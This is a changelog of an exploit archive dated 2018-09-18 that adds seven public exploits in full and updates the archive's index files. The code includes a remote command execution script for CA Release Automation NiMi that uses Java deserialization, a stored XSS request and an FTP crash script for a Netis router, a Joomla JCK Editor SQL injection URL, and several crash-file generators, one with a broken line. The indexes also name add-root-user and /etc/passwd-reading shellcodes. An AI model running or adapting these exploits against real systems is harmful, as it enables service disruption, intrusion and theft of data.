DB: 2018-09-18

7 changes to exploits/shellcodes

XAMPP Control Panel 3.2.2 - Denial of Service (PoC)
Notebook Pro 2.0 - Denial Of Service (PoC)
Oracle VirtualBox Manager 5.2.18 r124319  - 'Name Attribute' Denial of Service (PoC)
Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)

CA Release Automation NiMi 6.5 - Remote Command Execution

Gitweb 1.7.3.3 - Cross-Site Scripting
gitWeb 1.7.3.3 - Cross-Site Scripting
Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting
Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection

Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)
Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)
Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)
Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes)
Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes)
Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)
Linux/x86 - echo _Hello World_ + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)

exploits/hardware/dos/45424.py

@@ -0,0 +1,43 @@
+# Exploit Title: Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)
+# Author: Cakes
+# Discovery Date: 2018-09-16
+# Vendor Homepage: http://www.netis-systems.com
+# Software Link: http://www.netis-systems.com/Home/detail/id/74.html
+# Tested Version: RTK 2.1.1
+# Tested on OS: Kali Linux
+# CVE: N/A
+
+# Description
+# The FTP service is vulnerable to a Denial of Service attack. Attackers simply need to log
+# into the router and send and valid FTP command with a character offset of 1461 as the command input
+
+import socket 
+
+evil = '\x41'*1461
+
+print "\n[*] Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)"
+print "\r[i] Creating socket"
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+print "\r[i] Connecting..."
+connect = s.connect(('192.168.1.1',21))
+s.recv(1024)
+
+try:
+	s.send('USER guest\r\n')
+	s.recv(1024)
+	s.send('PASS guest\r\n')
+	s.recv(1024)
+	print "\r[+] Connected"
+except:
+	print "\r[!] Credentials aren't working. Please change if none default"
+	
+print "\r[+] Sending Payload"
+
+try:
+	s.send('ABOR %s' % (evil))
+	print "\r[+] Payload sent"
+	print "\r[+] Router offline"
+except:
+	print "\r[!] Something went wrong"
+	
+s.close()

exploits/hardware/webapps/45422.txt

@@ -0,0 +1,30 @@
+# Exploit Title: Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting
+# Author: Cakes
+# Discovery Date: 2018-09-16
+# Vendor Homepage: http://www.netis-systems.com
+# Software Link: http://www.netis-systems.com/Home/detail/id/74.html
+# Tested Version: RTK 2.1.1
+# Tested on OS: Kali Linux
+# CVE: N/A
+
+# Description:
+# Improper input validation on the  router web interface allows attackers add a persistent 
+# Cross-Site scripting attack on the Dynamic DNS hostname field. Simply intercept a renaming 
+# request and add in the XSS
+
+# Poc
+
+POST /form2Ddns.cgi HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Referer: http://Target/ddns.htm?v=1537192256000
+Cookie: SessionID=
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 119
+
+ddnsProv=0&hostname=<script>alert("Cakes");</script>&interface=15&enable=on&username=tester&password=tester&addacc=Add&submit.htm%3Fddns.htm=Send

exploits/java/remote/45425.py

@@ -0,0 +1,62 @@
+# Exploit Title: CA Release Automation NiMi 6.5 - Remote Command Execution
+# Date: 2016-06-23
+# Exploit Authors: Jakub Palaczynski, Maciej Grabiec
+# Vendor Homepage: http://www.ca.com/
+# Software Link: https://docops.ca.com/ca-release-automation/5-5-2/en/installation/deploy-agents/
+# Version: CA Release Automation (NiMi) 5.X, 6.3, 6.4, 6.5
+# CVE: CVE-2018-15691
+# Info: CA Release Automation (NiMi) Remote Command Execution via Deserialization
+# Info: Payloads generated using CommonsCollections1 from ysoserial work correctly.
+# Info: Proof of Concept exploits NiMi service if security is turned off.
+
+#!/usr/bin/python
+
+import socket
+import sys
+import struct
+
+if len(sys.argv) < 4:
+    sys.stderr.write("[-]Usage: python %s <ip> <port> <payload_file> <target_nodeid - not mandatory>\n" % sys.argv[0])
+    sys.stderr.write("[-]Exemple: python %s 10.0.0.1 6600 /tmp/payload.bin\n" % sys.argv[0])
+    exit(1)
+ 
+host = sys.argv[1]
+port = sys.argv[2]
+file = sys.argv[3]
+
+# check if payload does not exceed specified value
+payloadObj = open(file,'rb').read()
+if len(payloadObj) > 5729:
+    print 'Payload must be less than 5730 bytes. Try another one.'
+    exit(1)
+
+# open socket to nimi port
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+print 'Connecting to node.'
+sock.connect((host, int(port)))
+
+# say hello to nimi
+sock.recv(256)
+sock.send('\x00\x00\x00\x0c\x0a\x04\x6e\x6f\x64\x65\x10\x0a\x72\x02\x08\x00') # first required message
+
+# get Node ID
+data = sock.recv(256)
+name = data[5] + data[6:6+ord(data[5])]
+if len(sys.argv) == 5:
+    name = struct.pack(">B", len(sys.argv[4])) + sys.argv[4]
+
+# check if security is enabled
+sock.send('\x00\x00\x00\x1a\x0a\x04\x6e\x6f\x64\x65\x10\x0a\x7a\x10\x0a\x0c\x0a\x07\x30\x2e\x30\x2e\x30\x2e\x30\x10\x94\x3c\x10\x00') # second required message
+check = sock.recv(256)
+if check == "":
+    print 'Security is enabled. Sorry.'
+    exit(1)
+
+# send payload
+print 'Sending payload.'
+header = '\x0a\x04\x6e\x6f\x64\x65\x10\x01\x1a' + name + '\x2a\xe4\x2c\x0a\xe1\x2c'
+stage = header + payloadObj + '\x90' * (5729-len(payloadObj))
+payload = struct.pack(">I", len(stage)) + stage
+
+sock.sendall(payload)
+sock.close()

exploits/php/webapps/45423.txt

@@ -0,0 +1,14 @@
+# Title: Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection
+# Date: 2018-09-14
+# Exploit Author: Hamza Megahed
+# Vendor Homepage:https://www.joomla.org/
+# Download: https://arkextensions.com/products/jck-editor
+# Version: 6.4.4
+# Tested on: Ubuntu, FireFox,
+# CVE: N/A
+
+# Parameter = parent
+# Payload = " UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL -- aa
+# Poc:
+
+Test = [HOST]/[PATH]/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa

exploits/windows_x86-64/dos/45420.py

@@ -0,0 +1,28 @@
+# Exploit Title : Notebook Pro 2.0 - Denial Of Service (PoC)
+# Exploit Author : Ali Alipour
+# WebSite : http://Alipour.it
+# Date: 2018-09-14
+# Vendor Homepage : http://www.stokedonit.com/apps/notebook-pro/
+# Software Link Download : https://www.microsoft.com/store/apps/9WZDNCRDMC76
+# Tested on : Windows 10 - 64-bit
+
+# Steps to Reproduce
+# Run the python exploit script, it will create a new 
+# file with the name "Notebook.txt" just copy the text inside "Notebook.txt"
+# and start the Notebook Pro 2.0 - In Microsoft Windows 10 . 
+# In The New Window Click On " New " And Click On notebook Button ( Create a New NoteBook ) .
+# Now Paste The Content Of "Notebook.txt" Into The Field: " New NoteBook Name ". 
+# Click "Create & Save" And You Will See a [ Boom !!!! ] - Notebook Pro 2.0 - In Microsoft Windows 10 [ Crash ].
+
+#!/usr/bin/python
+    
+buffer = "A" * 500
+payload = buffer
+try:
+    f=open("Notebook.txt",22"w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86-64/dos/45421.py

@@ -0,0 +1,28 @@
+# Exploit Title: Oracle VirtualBox Manager 5.2.18 r124319  - 'Name Attribute' Denial of Service (PoC)
+# Discovery by: Jose Eduardo Castro
+# Discovery Date: 2018-09-14
+# Vendor Homepage: https://www.virtualbox.org/
+# Software Link: https://download.virtualbox.org/virtualbox/5.2.18/VirtualBox-5.2.18-124319-Win.exe
+# Tested Version: 5.2.18 r124319
+# Tested on OS  : Windows 7 Ultimate x64 es
+ 
+#!/usr/bin/env python
+#-*-coding: utf-8-*-
+# Steps to Produce the DoS: 
+# 1.- Run python code : python vb_dos.py
+# 2.- Open string.txt and copy content to clipboard
+# 3.- Open VM VirtualBox Manager
+# 4.- Select a created virtual machine in mode "power off" and select "Settings"
+# 5.- Select "Storage" button
+# 6.- Select option "Adds new storage controller" and select any controller
+# 7.- Paste ClipBoard on "Name"
+# 8.- Clic OK
+# 9.- DoS
+ 
+import socket, os, sys
+ 
+buffer = "\x41" * 5000
+ 
+f = open ("string.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows_x86/dos/45419.py

@@ -0,0 +1,29 @@
+# Exploit Title: XAMPP Control Panel 3.2.2 - Denial of Service (PoC)
+# Exploit Author: Gionathan "John" Reale 
+# Date: 2018-09-14
+# Software: XAMPP 
+# Version: 3.2.2 / 7.2.9 (Newest version at time of writing)
+# Download: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/7.2.9/xampp-portable-win32-7.2.9-0-VC15-installer.exe/download
+# Tested on: Windows 7 32bit
+
+# Steps to Reproduce: 
+# Run the python exploit script, it will create a new file with the name "exploit.txt".
+# Copy the contents of "exploit.txt" 
+# Start the program and click "Config(Top Right With Symbol)"
+# Paste the contents of "exploit.txt" into the following fields:"Editor" & "Browser".
+# Click "Save" and then in the main window Click "Config" > "Apache (httpd.conf)". 
+# You will see a crash!
+
+#!/usr/bin/python
+
+buffer = "A" * 6000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

files_exploits.csv

@@ -6112,6 +6112,10 @@ id,file,description,date,author,type,platform,port
 45410,exploits/windows_x86-64/dos/45410.py,"CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)",2018-09-14,"Alan Joaquín Baeza Meza",dos,windows_x86-64,
 45413,exploits/windows_x86/dos/45413.py,"InfraRecorder 0.53 - '.txt' Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86,
 45414,exploits/windows_x86-64/dos/45414.py,"Faleemi Plus 1.0.2 - Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86-64,
+45419,exploits/windows_x86/dos/45419.py,"XAMPP Control Panel 3.2.2 - Denial of Service (PoC)",2018-09-17,"Gionathan Reale",dos,windows_x86,
+45420,exploits/windows_x86-64/dos/45420.py,"Notebook Pro 2.0 - Denial Of Service (PoC)",2018-09-17,"Ali Alipour",dos,windows_x86-64,
+45421,exploits/windows_x86-64/dos/45421.py,"Oracle VirtualBox Manager 5.2.18 r124319  - 'Name Attribute' Denial of Service (PoC)",2018-09-17,"Jose Eduardo Castro",dos,windows_x86-64,
+45424,exploits/hardware/dos/45424.py,"Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)",2018-09-17,cakes,dos,hardware,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16802,6 +16806,7 @@ id,file,description,date,author,type,platform,port
 45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware,
 45345,exploits/linux/remote/45345.txt,"Tenable WAS-Scanner 7.4.1708 - Remote Command Execution",2018-09-07,"Sameer Goyal",remote,linux,
 45367,exploits/multiple/remote/45367.rb,"Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit)",2018-09-10,Metasploit,remote,multiple,
+45425,exploits/java/remote/45425.py,"CA Release Automation NiMi 6.5 - Remote Command Execution",2018-09-17,"Jakub Palaczynski",remote,java,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -25254,7 +25259,7 @@ id,file,description,date,author,type,platform,port
 33671,exploits/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,webapps,php,
 15701,exploits/php/webapps/15701.txt,"MODx REvolution CMS 2.0.4-pl2 - POST injection Cross-Site Scripting",2010-12-06,LiquidWorm,webapps,php,
 15703,exploits/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b - Arbitrary File Upload",2010-12-07,"Sun Army",webapps,asp,
-15744,exploits/cgi/webapps/15744.txt,"Gitweb 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,webapps,cgi,80
+15744,exploits/cgi/webapps/15744.txt,"gitWeb 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,webapps,cgi,80
 15710,exploits/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",webapps,multiple,
 15711,exploits/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - Local File Inclusion",2010-12-09,Br0ly,webapps,php,
 15714,exploits/php/webapps/15714.txt,"Joomla! Component JE Auto 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",webapps,php,
@@ -39967,3 +39972,5 @@ id,file,description,date,author,type,platform,port
 45400,exploits/windows/webapps/45400.txt,"Apache Syncope 2.0.7 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,
 45409,exploits/linux/webapps/45409.rb,"Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit)",2018-09-14,"Stephen Shkardoon",webapps,linux,443
 45411,exploits/php/webapps/45411.txt,"Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection",2018-09-14,"Ceylan BOZOĞULLARINDAN",webapps,php,80
+45422,exploits/hardware/webapps/45422.txt,"Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting",2018-09-17,cakes,webapps,hardware,
+45423,exploits/php/webapps/45423.txt,"Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection",2018-09-17,"Hamza Megahed",webapps,php,

files_shellcodes.csv

@@ -908,7 +908,7 @@ id,file,description,date,author,type,platform
 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
 45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm
 45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm
-45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
-45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
-45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
-45418,shellcodes/linux_x86/45418.c,"Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45418,shellcodes/linux_x86/45418.c,"Linux/x86 - echo _Hello World_ + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86